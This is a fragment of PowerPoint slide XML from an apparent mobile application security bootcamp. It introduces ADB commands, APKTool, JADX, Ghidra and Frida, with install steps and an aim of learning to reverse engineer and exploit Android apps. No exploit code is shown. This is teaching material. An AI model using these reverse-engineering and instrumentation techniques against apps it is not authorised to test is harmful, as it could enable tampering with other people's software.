                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> cmd package list packages -f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Search apps with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>specic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> string :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>adb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> pm list packages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>owasp</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>adb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> cmd package list packages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>owasp</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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Android Debug Bridge (ADB)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2579249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87A1352-845E-4063-97FC-68EF6E3EDDDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="1447801"/>
            <a:ext cx="8503057" cy="4965699"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800"/>
              <a:t>Example :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="180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Android Debug Bridge (ADB)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53AC21C6-8A59-44D9-82D1-AC329CFF07D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="11653"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="314491" y="1984676"/>
            <a:ext cx="8096594" cy="2888648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2393641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A tool for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>reverse engineering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>3rd party, closed, binary Android apps.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>It can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>decode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> resources to nearly original form and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>rebuild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> them after making some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>modifications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>It also makes working with an app easier because of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>project like file structure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> and automation of some repetitive tasks like building </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> if you have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>latest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> version.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Installation guideline : https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>ibotpeaches.github.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Apktool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="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err="1"/>
              <a:t>APKTool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> : https://ibotpeaches.github.io/Apktool/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="GitHub - iBotPeaches/Apktool: A tool for reverse engineering Android apk  files"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="11682" b="20212"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696768" y="192056"/>
            <a:ext cx="1228042" cy="45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25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Decompile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Dalvik bytecode to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>java classes from APK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and zip files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>AndroidManifest.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and other resources from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>resources.arsc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Deobfuscator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> included</a:t>
            </a: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JADX : https://github.com/skylot/jadx</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40962" name="Picture 2" descr="GitHub - skylot/jadx: Dex to Java decompi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618" y="130408"/>
            <a:ext cx="612000" cy="6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40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CLI and GUI tools for producing Java source code from Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and APK files : </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="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JADX : https://github.com/skylot/jadx</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7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="353029" y="2442424"/>
            <a:ext cx="8437942" cy="3930306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40962" name="Picture 2" descr="GitHub - skylot/jadx: Dex to Java decompi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618" y="130408"/>
            <a:ext cx="612000" cy="6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58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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du texte 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>About </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>Bootcamp</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1628799"/>
            <a:ext cx="8229600" cy="479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en-US" sz="1800" dirty="0"/>
              <a:t>Learn more about mobile application security </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Understand tools and techniques to exploit mobile applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Get skills to perform reverse engineering, static and dynamic tests, binary analysis and other conventional attack vectors </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Comprises both demos + hands-on exercises</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Hands-on with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Allsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> and other custom applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Finally, learn how to build automated security testing (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>GithubActions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1800" dirty="0"/>
              <a:t>) to detect/prevent security issues before going to production !</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157516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a:t>A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>Useful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>advanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> native application RE :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-F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fr-FR"/>
              <a:t>GHIDRA : https://github.com/NationalSecurityAgency/ghidra</a:t>
            </a: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2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255460" y="2900278"/>
            <a:ext cx="6829596" cy="3472452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45058" name="Picture 2" descr="Ghidra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6800" y="103945"/>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1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A dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>code instrumentation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>toolkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It lets you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>inject snippets of JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or your own library into native apps on Windows, macOS, GNU/Linux, iOS, Android, and QNX.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Rooted device </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Need to install a Frida server on the Android device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Non rooted device </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Need to repackage the targeted app with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="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dirty="0"/>
              <a:t>Frida : https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>frida.re</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46082"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 Frida's Gadget Injection on Android: No Root, 2 Meth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169" y="4241743"/>
            <a:ext cx="5882178" cy="233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07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nSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Install Frida on your system (Easy way with pip)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># Install Frida and Python bindings</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pip</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install</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frida-tools</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># Upgrade to the last version available</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="200000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pip</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install</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upgradable</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frida</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="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dirty="0"/>
              <a:t>Frida : https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>frida.re</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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438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18730" y="1447801"/>
            <a:ext cx="8503057" cy="5221559"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Then, install Frida server on the Android device (or emulator) :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>VER=`</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 --version`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ABI=`</a:t>
            </a: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shell</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getprop</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ro.product.cpu.abi</a:t>
